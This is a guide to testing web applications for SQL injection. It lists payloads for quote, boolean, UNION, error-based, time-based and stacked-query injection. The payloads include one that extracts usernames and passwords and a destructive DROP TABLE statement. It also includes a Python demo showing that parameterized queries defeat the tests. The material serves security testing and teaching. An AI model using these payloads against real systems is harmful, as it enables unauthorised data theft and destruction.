When testing for SQL injection vulnerabilities, you can use a variety of SQL query patterns to identify potential weak points.
Basic SQL Injection Tests
1. Single Quote Test: Insert a single quote (') into an input field to see whether it breaks the query and produces a database error. Submitting admin' -- as the username, for example, turns the query into:
SELECT * FROM users WHERE username = 'admin' --';
2. Logical Condition Tests: Add conditions like 1=1 (always true) or 1=0 (always false) to test if input can alter the logic.
' OR 1=1 --
3. Comment Sequence: Use -- or # to comment out the remainder of the query, so that whatever follows the injection point is ignored; if the query still runs, injection is likely possible.
' OR 'a' = 'a' --
Union-Based Injection
Use UNION to append queries and extract data from other tables or columns.
1. Basic UNION Test
' UNION SELECT null, null --
2. Column Enumeration: Identify the number of columns by adding one null at a time to the UNION SELECT until the query no longer errors.
' UNION SELECT null, null, null --
3. Data Extraction: Once the column count matches, replace the null placeholders with real column names to retrieve specific data.
' UNION SELECT username, password FROM users --
Error-Based SQL Injection
Triggering errors can sometimes reveal information about the database structure.
1. Type Mismatch: Force a conversion error to reveal table or column names.
' AND 1 = CONVERT(int, (SELECT TOP 1 name FROM sys.tables)) --
2. Invalid Cast: Use a UNION whose column types don't match the original query's; the resulting conversion error message can include the value the database tried to cast.
' UNION SELECT 1, @@version --
Blind SQL Injection
When error messages aren't visible, infer true/false outcomes from differences in the application's behavior, such as response content or response time.
1. Time-Based Testing: Inject a delay function such as SLEEP or WAITFOR DELAY and check whether the response is delayed accordingly, which shows the injected condition was executed.
' OR IF(1=1, SLEEP(5), 0) --
2. Boolean-Based Tests: Craft queries where a true condition and a false condition produce visibly different responses.
' AND 1=1 -- (condition true)
' AND 1=2 -- (condition false)
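The single-quote, OR 1=1 and boolean-based tests above can be turned into a developer-side check: the same inputs are run against a query built by string concatenation and against a parameterized query, and the outcomes are compared. This is an added example, not code from the original page; it assumes an in-memory SQLite database with constructed sample data and hypothetical lookup_concat/lookup_param functions standing in for an application's query builder.

```python
import sqlite3

def make_db():
    # Constructed sample data for the demo; not taken from any real system.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'placeholder-hash')")
    return conn

def lookup_concat(conn, username):
    # Vulnerable: the input is spliced into the SQL text, so a quote or comment
    # sequence in the value becomes part of the statement's grammar.
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_param(conn, username):
    # Hardened: the value travels as a bound parameter and is only ever
    # compared as data; it cannot change the statement's structure.
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]

def probe(conn, fn, value):
    # Records what a caller would observe: the rows returned, or a DB error.
    try:
        return ("rows", fn(conn, value))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)

def run_tests(fn):
    # Applies the page's basic tests to one query builder and returns the
    # observable outcome of each, keyed by test name.
    conn = make_db()
    return {
        "single_quote": probe(conn, fn, "'"),
        "or_true": probe(conn, fn, "' OR 1=1 --"),
        "bool_true": probe(conn, fn, "admin' AND 1=1 --"),
        "bool_false": probe(conn, fn, "admin' AND 1=2 --"),
    }

def is_injectable(fn):
    # Injection is indicated when a lone quote causes a database error, when
    # OR 1=1 returns rows it should not, or when the true/false pair differs.
    r = run_tests(fn)
    return (r["single_quote"][0] == "error"
            or r["or_true"] == ("rows", ["admin"])
            or r["bool_true"] != r["bool_false"])

if __name__ == "__main__":
    print("concat injectable:", is_injectable(lookup_concat))  # True
    print("param  injectable:", is_injectable(lookup_param))   # False
```

With the parameterized version every test input is treated as a literal username, so all four probes return no rows and no error; the concatenated version errors on the quote and changes its result set on the logic tests.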
Advanced Techniques
1. Subquery Injection: Extract data using nested subqueries.
' AND (SELECT COUNT(*) FROM users) > 0 --
2. Stacked Queries: Inject multiple statements separated by semicolons in one request. Not all databases and drivers allow this, but where it is enabled it can be used to run arbitrary additional statements.
'; DROP TABLE users; --